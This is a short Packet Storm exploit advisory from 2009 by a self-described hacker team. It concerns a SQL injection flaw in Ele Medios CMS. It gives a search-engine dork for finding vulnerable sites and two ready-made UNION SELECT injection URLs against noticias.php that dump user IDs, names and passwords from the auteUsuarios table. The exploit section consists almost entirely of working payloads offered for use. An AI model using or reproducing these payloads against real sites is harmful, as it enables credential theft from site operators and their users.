Ele Medios CMS SQL Injection

2009-12-13T00:00:00
ID PACKETSTORM:83765
Type packetstorm
Reporter Cr3w-D
Modified 2009-12-13T00:00:00

Description

                                        
                                            `  
view source  
print?  
ALGERIAN HACKER  
**********************- NORTH-AFRICA SECURITY TEAM -***********************  
  
[!] Ele Medios CMS SQL Injection Vulnerability  
[!] Author : Dr.0rYX and Cr3w-DZ  
[!] MAIL : vx3@hotmail.de & Cr3w@hotmail.de  
  
***************************************************************************/  
  
[ Software Information ]  
  
[+] Vendor : http://www.elemedios.net/  
[+] script : Ele Medios CMS  
[+] Download : http://www.elemedios.net/  
[+] Vulnerability : php SQL injection  
[+] Dork :inurl:"noticias.php?notiId="  
  
**************************************************************************/  
[ Vulnerable File ]  
  
http://server/noticias.php?notiId=[N.A.S.T ]  
  
[ Exploit ]  
  
http://server/noticias.php?notiId=-1+union+select+1,GROUP_Concat(id,0x3a,nombre,0x3a,clave),3,4,5,6,7+from+auteUsuarios  
  
http://server/noticias.php?notiId=-1+union+select+1,GROUP_Concat(id,0x3a,nombre,0x3a,clave),3,4,5,6,7+8+from+auteUsuarios  
  
[ GReets ]  
  
[+] :claw , le0n , exploit-db.com , ALL HACKERS MUSLIMS  
  
`